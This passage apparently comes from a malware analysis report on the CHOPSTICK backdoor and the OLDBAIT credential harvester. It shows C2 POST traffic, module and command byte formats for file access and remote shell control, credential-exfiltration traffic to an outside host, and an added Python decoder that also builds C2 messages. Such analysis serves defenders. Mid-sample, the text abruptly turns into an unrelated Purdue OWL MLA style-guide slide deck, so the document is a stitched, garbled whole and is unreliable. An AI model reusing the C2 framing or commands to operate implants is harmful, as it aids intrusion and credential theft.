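Run against the Figure 13 value, decode_ai_parameter yields a 7-byte and a 4-byte field; the report does not state their contents, so only the lengths are checked.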
After uploading edg6EF885E2.tmp, CHOPSTICK continues to query its C2 servers for commands using HTTP GET requests. The malware contains code which allows it to load or memory-map external modules that export the following functions: SendRawPacket, GetRawPacket, InitializeExp, DestroyExp, IsActiveChannel, GetChannelInfo, SetChannelInfo, Run, GetModuleInfo, GiveMessage, and TakeMessage.
Modularity
CHOPSTICK backdoors are compiled within a modularized development framework. This means that two separate CHOPSTICK backdoors may contain vastly different functionality, depending on which modules were included at compile time. The modules that are included in an instance of CHOPSTICK may be reported to the C2 server as part of POST messages. Figure 14 includes an example from a CHOPSTICK v1 variant:
Figure 14: Sample CHOPSTICK v1 HTTP POST including module identification

POST /webhp?rel=psy&hl=7&ai=d2SSzFKlR4l0dRd_ZdyiwE17aTzOPeP-PVsYh1lVAXpLhIebB4= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Host: adobeincorp.com
Content-Length: 71
Cache-Control: no-cache

d2SSzFKchH9IvjcM55eQCTbMbVAU7mR0IK6pNOrbFoF7Br0Pi__0u3Sf1Oh30_HufqHiDU=
To decode the POST content, the first step is to remove characters from the Base64 string (the number of characters to remove may vary between different communication channels). In the example from Figure 14, the number of characters removed is seven. Once these characters are removed the decoded (but still encrypted) text looks like this:

00000000  72 11 fd 22 f8 dc 33 9e 5e 40 24 db 31 b5 40 53  r.."..3.^@$.1.@S
00000010  b9 91 d0 82 ba a4 d3 ab 6c 5a 05 ec 1a f4 3e 2f  ........lZ....>/
00000020  ff d2 ed d2 7f 53 a1 df 4f c7 b9 fa 87 88 35     .....S..O.....5
The first two words (“72 11” and “fd 22”) are checksums that are used to validate the message. The next 4 bytes “f8 dc 33 9e” are a salt value that is appended to the end of an RC4 key. Once decrypted, the message looks like the following:
00000000  72 11 fd 22 f8 dc 33 9e 56 34 4d 47 4e 78 5a 57  r.."..3.V4MGNxZW
00000010  6c 76 63 6d 68 6a 4f 47 39 79 5a 51 3d 3c 3c ee  lvcmhjOG9yZQ=<<.
00000020  01 00 00 01 00 23 01 10 23 01 11 23 01 13 23     .....#..#..#..#
The strings “V4MGNxZWlvcmhjOG9yZQ” and “=<<\xee” are hardcoded in the implant. The module information starts at offset 0x20 with the bytes “01 00 00” and is formatted as follows:
Table 11: Example CHOPSTICK v1 message format

Offset  Value                                Description
00      0x0001                               Message from the AgentKernel v1
02      00                                   Command ID
03      01 00 23 01 10 23 01 11 23 01 13 23  List of modules included in the implant, separated by a ‘#’ (0x23) character
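A decoder for this v1 framing, added here as an example (not the report's or the malware's code): it drops the junk prefix, Base64-decodes, keeps the two checksum words and the salt in the clear, RC4-decrypts the rest with static key + salt, checks the hard-coded marker at offset 0x08, then parses the kernel ID, command ID and ‘#’-separated little-endian module IDs at offset 0x20, and splits a module ID into its type byte and kernel-version byte. The RC4 key and the sample message are constructed; the report gives neither the key nor the checksum algorithm, and it is assumed from the two dumps that only bytes from offset 0x08 onward are encrypted.

```python
import base64
import binascii
import random
import string

# Constructed for this example; the real 50-byte static key is not in the report.
SAMPLE_RC4_KEY = b"example-static-key-not-the-real-one"
# 24 hard-coded plaintext bytes found at offset 0x08 of the decrypted message.
HARDCODED_MARKER = b"V4MGNxZWlvcmhjOG9yZQ" + b"=<<\xee"
PREFIX_LEN = 7          # junk characters for the Figure 14 channel
MODULE_SEP = 0x23       # '#'


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_v1_post_body(kernel_id: int, command_id: int, modules: list[int],
                       salt: bytes, checksums: bytes = b"\x72\x11\xfd\x22",
                       rc4_key: bytes = SAMPLE_RC4_KEY) -> str:
    """Encoder side, used only to construct test input. The checksum words are
    passed through unchanged because the report does not describe the algorithm."""
    header = kernel_id.to_bytes(2, "little") + bytes([command_id])
    mods = b"".join(m.to_bytes(2, "little") + bytes([MODULE_SEP]) for m in modules)
    cipher = rc4(rc4_key + salt, HARDCODED_MARKER + header + mods)
    junk = "".join(random.choice(string.ascii_letters) for _ in range(PREFIX_LEN))
    return junk + base64.urlsafe_b64encode(checksums + salt + cipher).decode()


def parse_v1_post_body(body: str, rc4_key: bytes = SAMPLE_RC4_KEY,
                       prefix_len: int = PREFIX_LEN) -> dict:
    """Strip junk, Base64-decode, RC4-decrypt with key+salt, parse the module list."""
    try:
        raw = base64.urlsafe_b64decode(body[prefix_len:])
    except binascii.Error as exc:
        raise ValueError(f"not valid Base64 after {prefix_len} prefix chars: {exc}") from exc
    if len(raw) < 0x20 + 3:
        raise ValueError("message too short for a v1 kernel header")
    checksums, salt = raw[0:4], raw[4:8]
    # Bytes 0x00-0x07 stay in the clear; the salt is appended to the static key.
    plain = rc4(rc4_key + salt, raw[8:])
    if plain[:len(HARDCODED_MARKER)] != HARDCODED_MARKER:
        raise ValueError("hard-coded marker missing: wrong key, wrong prefix length, or not CHOPSTICK v1")
    info = plain[len(HARDCODED_MARKER):]        # offset 0x20 of the message
    kernel_id = int.from_bytes(info[0:2], "little")
    command_id = info[2]
    modules = []
    module_bytes = info[3:]
    # Each entry is a little-endian u16 followed by the '#' separator.
    for off in range(0, len(module_bytes) - 2, 3):
        if module_bytes[off + 2] != MODULE_SEP:
            raise ValueError(f"module list not '#'-separated at offset {off}")
        modules.append(int.from_bytes(module_bytes[off:off + 2], "little"))
    return {"checksums": checksums, "salt": salt, "kernel_id": kernel_id,
            "command_id": command_id, "modules": modules}


def split_module_id(module_id: int) -> tuple[int, int]:
    """0x1101 -> (0x11, 0x01): module type in the first byte, kernel version in the second."""
    return (module_id >> 8) & 0xFF, module_id & 0xFF
```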
The modules included in this CHOPSTICK v1 implant are listed in Table 12.

Our determination of a CHOPSTICK “v1” versus “v2” is based on the self-identification of the kernel ID and associated modules. Compare the list of CHOPSTICK v1 modules in Table 12 with the list of modules in an example CHOPSTICK v2 variant in Table 13:
Table 12: Example CHOPSTICK v1 module list

Module ID  Internal Module Name  Description
0x0001     AgentKernel           Kernel, probably version 1. Handles communication between modules and C2 tunnels.
0x1001     modKey                Logs keystrokes and takes screen captures.
0x1101     modFS                 Facilitates file system access, such as directory browsing along with reading, deleting and opening files.
0x1301     modProcRet            Remote command shell access.
Table 13: Example CHOPSTICK v2 module list

Module ID  Internal Module Name  Description
0x0002     kernel                Kernel, probably version 2. Handles communication between modules and C2 tunnels.
0x1002                           Logs keystrokes and takes screen captures.
0x1102                           Facilitates filesystem access, such as directory browsing along with reading, deleting and opening files.
0x1302                           Remote command shell access.
0x1602                           Load additional DLLs.
The kernel IDs 0x0001 and 0x0002 indicate different versions. The corresponding modules in each backdoor also are consistently identified with 0x01 and 0x02, respectively, in the second byte. In both variants the modules with keystroke log, file system access, and command shell capabilities have the consistent identifiers 0x10, 0x11, and 0x13, respectively, in the first byte. This suggests that the first byte in the module ID identifies the module type whereas the second byte identifies the kernel version.

The kernel sends commands to each module using its module ID. The commands that each module understands are likely consistent from build to build. Table 14 and Table 15 show examples of commands that each module understands.
Table 14: Commands understood by modFS (0x1101) module

Command ID  Description   Example
01          Find file     \x01\x11\x01Directory&file&[01]
02          Read file     \x01\x11\x02Directory&file&[01]
03          Write file    \x01\x11\x03Directory&file&[Contents]
04          Delete file   \x01\x11\x04Directory&file&[01]
05          Execute file  \x01\x11\x05Directory&file&[01]
Table 15: Commands understood by modProcRet (0x1301) module

Command ID  Description     Example
00          CMD.exe output  \x01\x13\x00[Output]
01          CMD.exe start   \x01\x13\x01
02          CMD.exe exit    \x01\x13\x02
11          CMD.exe input   \x01\x13\x11[Input]
APPENDIX E:
OLDBAIT

OLDBAIT is a credential harvester that installs itself in %ALLUSERPROFILE%\Application Data\Microsoft\MediaPlayer\update\windws.exe. There is a missing space in the MediaPlayer directory and the filename is missing the ‘o’ character. Both the internal strings and logic are obfuscated and are unpacked at startup. Credentials for the following applications are collected:
• Internet Explorer
• Mozilla Firefox
• Eudora
• The Bat! (an email client made by a Moldovan company)
• Becky! (an email client made by a Japanese company)

Both email and HTTP can be used to send out the collected credentials. Sample HTTP traffic is displayed in Figure 15.

Figure 15: Example OLDBAIT HTTP traffic

POST /index.php HTTP/1.0
Accept: text/html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Content-Length: 6482
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: windous.kz
Connection: Keep-Alive
Pragma: no-cache

prefs=C789Cu0Zacq7acr0D7LUawy6CY4REIaZBciWc6yVCN--cut--
OLDBAIT handles APIs very similarly to SOURFACE and EVILTOSS. There is a setup routine that loads the imports into a table and all API calls reference an index into this table. In SOURFACE and EVILTOSS the table is stored in a global variable, while in OLDBAIT this table is allocated at runtime and a pointer is passed between functions.
Figure 16: Example OLDBAIT SMTP traffic
From: [email protected]
To: [email protected]
Subject: photo(9a3d8ea4-test)
Date: Tue, 23 Sep 2014 15:42:56 -0500
MIME-Version: 1.0
MLA 8th Edition Formatting and Style Guide
Purdue OWL Staff
Brought to you in cooperation with the Purdue Online Writing
Lab
Welcome to “MLA Formatting and Style Guide“. This Power
Point Presentation is designed to introduce your students to the
basics of MLA Formatting and Style. You might want to
supplement the presentation with more detailed information
available on the OWL’s “MLA Formatting and Style Guide“ at
http://owl.english.purdue.edu/owl/resource/747/01/
Designer: Ethan Sproat
Based on slide designs from the OWL “APA Formatting and
Style Guide “powerpoint by Jennifer Liethen Kunka and Elena
Lawrick.
Contributors: Tony Russell, Allen Brizee, Jennifer Liethen
Kunka, Joe Barbato, Dave Neyhart, Erin E. Karper, Karl
Stolley, Kristen Seas, Tony Russell, and Elizabeth Angeli.
Revising Author: Arielle McKee, 2014
*
MLA (Modern Language Association) Style formatting is often
used in various humanities disciplines.
In addition to the handbook, MLA also offers The MLA Style
Center, a website that provides additional instruction and
resources for writing and formatting academic papers.
https://style.mla.org/
What is MLA?
The MLA Handbook for Writers of Research Papers, 8th ed.
supersedes both the 7th edition handbook and the MLA Style
Manual and Guide to Scholarly Publishing, 3rd ed. The style of
documentation outlined in the 8th edition serves the needs of
students who are writing research papers, as well as scholars
who publish professionally. This presentation will mostly focus
on MLA formatting and style concerns that affect writing
research papers.
MLA style is often used in the following disciplines:
humanities, languages, literature, linguistics, philosophy,
communication, religion, and others.
MLA format provides writers with a uniform format for
document layout and documenting sources. Proper MLA style
shows that writers are conscientious of the standards of writing
in their respective disciplines. Properly documenting sources
also ensures that an author is not plagiarizing.
*
MLA regulates:
・ document format
・ in-text citations
・ works-cited list
What does MLA regulate?
This slide presents three basic areas regulated by MLA students
need to be aware of—document format, in-text citations, and
works cited. The following slides provide detailed explanations
regarding each area.
*
The 8th edition handbook introduces a new way to cite sources.
Instead of a long list of rules, MLA guidelines are now based on
a set of principles that may be used to cite any type of source.
The three guiding principles:
・ Cite simple traits shared by most works.
・ Remember that there is more than one way to cite the same source.
・ Make your documentation useful to readers.
MLA Update 2016
Principle 1: In previous versions of the MLA Handbook, an
entry in the works-cited list was based on the source’s
publication format (book, periodical, Web article, etc.). The
issue with that system is that a work in a new type of medium
could not be properly cited until MLA created a format for it. In
the current system, sources are documented based on facts that
are common to all types of publications, such as author, title,
and year. Now, in order to cite a source, a writer now must
examine it and document it based on a set of universal
principles (more about that to come).
Principle 2: Two scholars may use the same source differently.
Therefore, a writer who is working on a specialized topic in a
particular field will include documentation information that a
writer who is using the source more generally will not.
Principle 3: As a writer, you document sources so that your
readers may locate them and learn more about your particular
argument or essay. Proper citation demonstrates your credibility
by showing that you’ve thoroughly researched your topic. Your
citations must be comprehensive and consistent so that readers
may find the sources consulted and come to their own opinions
on your topic.
*
This presentation will cover:
・ How to format a paper in MLA style (8th ed.): general guidelines, first page format, section headings
・ In-text citations: formatting quotations
・ Documenting sources in MLA style (8th ed.): core elements, list of works cited
Overview
This PPT will cover the 2016 updates to the 8th edition of the
MLA Handbook: how to format a paper, create in-text citations,
and document sources.
*
Basic rule for any formatting style:
Always
Follow your instructor’s
guidelines
Your Instructor Knows Best
Many instructors who require their students to use MLA
formatting and citation style have small exceptions to different
MLA rules. Every bit of instruction and direction given in this
presentation comes with this recommendation: ALWAYS follow
the specific instructions given by your instructor.
*
An MLA Style paper should:
・ Be typed on white 8.5“ x 11“ paper
・ Double-space everything
・ Use 12 pt. Times New Roman (or similar) font
・ Leave only one space after punctuation
・ Set all margins to 1 inch on all sides
・ Indent the first line of paragraphs one half-inch
Format: General Guidelines
The entire document should be double-spaced, including the heading, block quotations, footnotes/endnotes, and list of works cited. There should be no extra space between paragraphs. Leave only one space after periods or other punctuation marks (unless otherwise instructed by your instructor). Set the margins of your document to 1 inch on all sides. Indent the first line of paragraphs one half-inch from the left margin. MLA recommends that you use the Tab key as opposed to pushing the Space Bar five times.
*
The first page of an MLA Style paper will:
・ Have no title page
・ Double space everything
・ List your name, your instructor's name, the course, and date in the upper left-hand corner
・ Center the paper title (use standard caps but no underlining, italics, quote marks, or bold typeface)
・ Use italics for titles
Formatting the 1st Page
・ Do not make a title page for your paper unless specifically
requested
・ In the upper left-hand corner of the first page, list your name,
your instructor's name, the course, and the date. Again, be sure
to use double-spaced text.
・ Double space again and center the title.
Do not underline, italicize, or place your title in quotation
marks; write the title in Title Case (standard capitalization), not
in all capital letters.
・ Use quotation marks and/or italics when referring to other
works in your title, just as you would in your text: Fear and
Loathing in Las Vegas as Morality Play; Human Weariness in
“After Apple Picking“
・ Double space between the title and the first line of the text.
・ Create a header in the upper right-hand corner that includes
your last name, followed by a space with a page number;
number all pages consecutively with Arabic numerals (1, 2, 3,
4, etc.), one-half inch from the top and flush with the right
margin. (Note: Your instructor or other readers may ask that
you omit last name/page number header on your first page.
Always follow instructor guidelines.)
*
Sample 1st Page
*
An in-text citation is a brief reference in your text that indicates
the source you consulted.
It should direct readers to the entry in your works-cited list for
that source.
It should be unobtrusive: provide the citation information
without interrupting your own text.
In general, the in-text citation will be the author’s last name (or
abbreviated title) with a page number, enclosed in parentheses.
In-Text Citations: the Basics
Basic In-Text Citation Rules
The source information in a parenthetical citation should direct
readers to the source’s entry in the works-cited list.
The in-text citation should be placed, if possible, where there is
a natural pause in your text. If the citation refers to a direct
quotation, it should be placed directly following the closing
quotation mark.
Any source information that you provide in-text must
correspond to the source information on the works-cited page.
More specifically, whatever signal word or phrase you provide
to your readers in the text, must be the first thing that appears
on the left-hand margin of the corresponding entry in the works-
cited list (so the author’s last name or the title, usually, with no
punctuation in between)
*
In-text Example:
Corresponding Works Cited Entry:
Wordsworth, William. Lyrical Ballads. Oxford UP, 1967.
Author-Page Style
Wordsworth stated that Romantic poetry was marked by a
“spontaneous overflow of powerful feelings” (263). Romantic
poetry is characterized by the “spontaneous overflow of
powerful feelings” (Wordsworth 263). Wordsworth extensively
explored the role of emotion in the creative process (263).
In-Text Citations: Author-Page Style
MLA format follows the author-page method of in-text citation.
This means that the author's last name and the page number(s)
from which the quotation or paraphrase is taken must appear in
the text, and a complete reference should appear in your works-
cited page. The author's name may appear either in the sentence
itself or in parentheses following the quotation or paraphrase,
but the page number(s) should always appear in the parentheses,
not in the text of your sentence.
Both citations in the in-text examples on this slide, (263)
and (Wordsworth 263), tell readers that the information in the
sentence can be located on page 263 of a work by the author,
William Wordsworth. If readers want more information about
this source, they can turn to the works-cited list, where, under
Wordsworth, they would find the information in the
corresponding entry also shown on this slide.
*
Print Source with Author
For the following print source
Burke, Kenneth. Language as Symbolic Action: Essays on Life,
Literature, and Method. U of California P, 1966.
If the essay provides a signal word or phrase—usually the
author’s last name—the citation does not need to also include
that information.
Examples:
Humans have been described by Kenneth Burke as “symbol-using animals” (3).
Humans have been described as “symbol-using animals” (Burke
3).
In-text Citations for Print Sources with Known Author
For print sources like books, magazines, scholarly journal
articles, and newspapers, provide a signal word or phrase
(usually the author’s last name) and a page number. If you
provide the signal word/phrase in the sentence, you do not need
to include it in the parenthetical citation. These examples must
correspond to an entry that begins with Burke, which will be the
first thing that appears on the left-hand margin of an entry in
the works-cited list (as noted in the corresponding entry on this
slide). See comments from previous slide.
*
How to cite a work with no known author:
We see so many global warming hotspots in North America
likely because this region has “more readily accessible climatic
data and more comprehensive programs to monitor and study
environmental change…” (“The Impact of Global Warming” 6).
With Unknown Author
In-text Citations for Print Sources with No Known Author
When a source has no known author, use a shortened title of the
work instead of an author name. Place the title in quotation
marks if it's a short work (e.g. articles) or italicize it if it's a
longer work (e.g. plays, books, television shows, entire
websites) and provide a page number.
In this example, since the reader does not know the author of
the article, an abbreviated title of the article appears in the
parenthetical citation which corresponds to the full name of the
article which appears first at the left-hand margin of its
respective entry in the works-cited list. Thus, the writer
includes the title in quotation marks as the signal phrase in the
parenthetical citation in order to lead the reader directly to the
source on the works-cited page. See comments from previous
slide.
*
Corresponding Entry in the List of Works Cited:
“The Impact of Global Warming in North America.” Global
Warming: Early Signs. 1999. Accessed 23 Mar. 2009.
With Unknown Author
And this is how the works-cited listing should look. While this
entry is technically correct, it would help your readers more
readily access the source if you include the URL here (it would
go before the access date).
*
Works with Multiple Editions
In-text example:
Marx and Engels described human history as marked by class
struggles (79; ch. 1).
Authors with Same Last Names
In-text example:
Although some medical ethicists claim that cloning will lead to
designer
children (R. Miller 12), others note that the advantages for
medical research outweigh this consideration (A. Miller 46).
Other In-Text Citations 1
In parenthetical citations of a literary work available in multiple
editions, such as a commonly studied novel, it is often helpful
to provide division numbers in addition to page numbers so that
your readers can find your references in any edition of the
work.
Make sure that your in-text citations refer unambiguously to the
entry in your works-cited list. If you are citing from the works
of two different authors with the same last name, include the
author’s first initial in your reference.
*
Work by Multiple Authors
In-text Examples:
Smith et al. argues that tougher gun control is not needed in the
United States (76).
The authors state: “Tighter gun control in the United States
erodes Second Amendment rights” (Smith et al. 76).
A 2016 study suggests that stricter gun control in the United
States will significantly prevent accidental shootings (Strong
and Ellis 23).
Other In-Text Citations 2
Citing a Work by Multiple Authors
If the entry in the works-cited list begins with the names of two
authors, include both last names in the in-text citation,
connected by and.
If the source has three or more authors, the entry in the works-
cited list should begin with the first author’s name followed by
et al. The in-text citation should follow suit.
*
Multiple Works by the Same Author
In-text examples:
Lightenor has argued that computers are not useful tools for
small children (“Too Soon” 38), though he has acknowledged
elsewhere that early exposure to computer games does lead to
better small motor skill development in a child's second and
third year (“Hand-Eye Development” 17).
Visual studies, because it is such a new discipline, may be “too
easy” (Elkins, “Visual Studies” 63).
Other In-Text Citations 3
Citing Multiple Works by the Same Author
If you cite more than one work by a particular author, include a
shortened title for the particular work from which you are
quoting to distinguish it from the others. This is illustrated in
the first example on this slide. Additionally, if the author's
name is not mentioned in the sentence, format your citation with
the author's name followed by a comma, followed by a
shortened title of the work, followed, when appropriate, by page
numbers. This is illustrated in the second example on this slide.
*
Works in time-based media
In-text example:
Buffy’s promise that “there’s not going to be any incidents like
at my old school” is obviously not one on which she can follow
through (“Buffy” 00:03:16-17).
Works-cited entry:
“Hush.” Buffy the Vampire Slayer, created by Joss Whedon,
performance by Sarah Michelle Gellar, season 4, episode 10,
Mutant Enemy, 1999.
Other In-Text Citations 6
For works in time-based media, such as audio and video
recordings, cite the relevant time or range of times. Give the
numbers of the hours, minutes, and seconds as displayed in your
media player, separating the numbers with colons.
*
Sources without page numbers
In-text example:
Disability activism should work toward “creating a habitable
space for all beings” (Garland-Thomson).
Corresponding works-cited entry:
Garland-Thomson, Rosemarie. “Habitable Worlds.” Critical
Disability
Studies Symposium. Feb. 2016, Purdue University, Indiana.
Address.
Other In-Text Citations 7
When a source has no page numbers or any other kind of part
number, no number should be given in a parenthetical citation.
Do not count unnumbered paragraphs, pauses, or other parts.
This is an example of how to cite a direct quotation from an oral
address.
*
Short prose quotations
In-text example:
According to Foulkes's study, dreams may express “profound
aspects of personality” (184).
Is it possible that dreams may express “profound aspects of
personality” (Foulkes 184)?
Formatting Short Quotations (in Prose)
Short Quotations
If a prose quotation runs no more than four lines and requires
no special emphasis, put it in quotation marks and incorporate it
into the text. Provide the author and specific page citation in
the text, and include a complete entry in the works-cited page.
Punctuation marks such as periods, commas, and semicolons
should appear after the parenthetical citation. Question marks
and exclamation points should appear within the quotation
marks if they are a part of the quoted passage but after the
parenthetical citation if they are a part of your text.
*
Quoting four or more lines of prose
In-text example:
Nelly Dean treats Heathcliff poorly and dehumanizes him
throughout her narration:
They entirely refused to have it in bed with them, or even
in their room,
and I had no more sense, so, I put it on the landing of the
stairs, hoping
it would be gone on the morrow. By chance, or else
attracted by hearing
his voice, it crept to Mr. Earnshaw's door, and there he
found it on
quitting his chamber. Inquiries were made as to how it
got there; I was
obliged to confess, and in recompense for my cowardice
and inhumanity
was sent out of the house. (Bronte 78)
Formatting Long Quotations (in Prose)
In quotations that are four or more lines of text, start the
quotation on a new line, with the entire quote indented half an
inch from the left margin; maintain double-spacing. Do not
indent the first line an extra amount or add quotation marks not
present in the original. Use a colon to introduce the quotation
(unless your introductory wording does not require
punctuation). Your parenthetical citation should come after the
closing punctuation mark. Note: If a new paragraph begins in
the middle of the quotation, indent its first line.
*
Each entry in the list of works cited is made up of core elements
given in a specific order.
The core elements should be listed in the order in which they
appear here. Each element is followed by the punctuation mark
shown here.
Works Cited: The Basics
While earlier editions of the MLA Handbook showed writers
how to create a works-cited entry based on the source’s
publication format (book, periodical, film, etc.), the updated 8th
edition demonstrates that documentation should be created by
consulting the list of core elements. Rather than asking: “how
do I cite a book, DVD, or webpage,” the writer now creates an
entry by looking at the list of core elements– which are facts
common to most works– and assembling them in a specific
order.
These changes have been made to reflect the differences in how
we consult works. In the updated model, the writer should ask:
“who is the author?” and “what is the title?”, regardless of the
nature of the source. The following slides will explain each of
the core elements, and how they might differ from one medium
to another.
*
Author.
Begin the entry with the author’s last name, followed by a
comma and the rest of the name, as presented in the work. End
this element with a period.
Examples:
Baron, Naomi S. “Redefining Reading: The Impact of Digital
Communication Media.” PMLA, vol. 128, no. 1, Jan. 2013,
pp.
193-200.
Jacobs, Alan. The Pleasures of Reading in an Age of
Distraction.
Oxford UP, 2011.
Works-cited List: Author
While these examples are in different mediums (the first one is
a periodical, the second is a printed book), they are both
formatted according to the list of key elements. Note: there are
other types of author situations, such as multiple authors,
translators, editors, corporate authors, performers, and
pseudonyms (such as online user names). Refer to the 8th
edition handbook or the MLA online Style Center
https://style.mla.org/ for more information.
*
Title of source.
Books and websites should be in italics:
Hollmichel, Stefanie. So Many Books. 2003-13,
somanybooksblog.com.
Linett, Maren Tova. Modernism, Feminism, and Jewishness.
Cambridge
UP, 2007.
Periodicals (journal, magazine, newspaper article), television
episodes, and songs should be in quotation marks:
Beyoncé. “Pretty Hurts.” Beyoncé, Parkwood
Entertainment, 2013,
Goldman, Anne. “Questions of Transport: Reading Primo
Levi Reading
Dante.” The Georgia Review, vol. 64, no. 1, 2010, pp.
69-88.
Works-cited List: Title of Source
The title of the source should follow the author’s name.
Depending upon the type of source, it should be listed in italics
or quotation marks.
*
Title of container,
Examples:
Bazin, Patrick. “Toward Metareading.” The Future of the Book,
edited by
Geoffrey Nunberg, U of California P, 1996, pp. 153-68.
Hollmichel, Stefanie. “The Reading Brain: Differences between
Digital
and Print.” So Many Books, 25 Apr. 2013,
“Under the Gun.” Pretty Little Liars, season 4, episode 6, ABC
Family,
Hulu, 16 July 2013.
Works-cited List: Title of Container
Containers are the larger wholes in which the source is located.
For example, if you want to cite a poem that is listed in a
collection of poems, the individual poem is the source, while
the larger collection is the container. The title of the container
is usually italicized and followed by a comma, since the
information that follows next describes the container.
In the first example, “Toward Metareading” is the title of an
essay, and The Future of the Book is the title of the edited
collection in which the essay appears.
The container may also be a website, which contains articles,
postings, and other works.
The container may also be a television series, which is made up
of episodes.
*
Other contributors,
Examples:
Chartier, Roger. The Order of Books: Readers, Authors, and
Libraries
in Europe between the Fourteenth and Eighteenth Centuries.
Translated by Lydia G. Cochrane, Stanford UP, 1994.
“Hush.” Buffy the Vampire Slayer, created by Joss Whedon,
performance by Sarah Michelle Gellar, season 4, episode 10,
Mutant Enemy, 1999.
Woolf, Virginia. Jacob’s Room. Annotated and with an
introduction by
Vara Neverow, Harcourt, Inc., 2008.
Works-cited List: Other Contributors
In addition to the author, there may be other contributors to the
source who should be credited, such as editors, illustrators,
performers, translators, etc. If their contributions are relevant to
your research, or necessary to identify the source, include their
names in your documentation.
Note: In the eighth edition, terms like editor, illustrator,
translator, etc., are no longer abbreviated.
*
Publisher,
The publisher produces or distributes the source to the public. If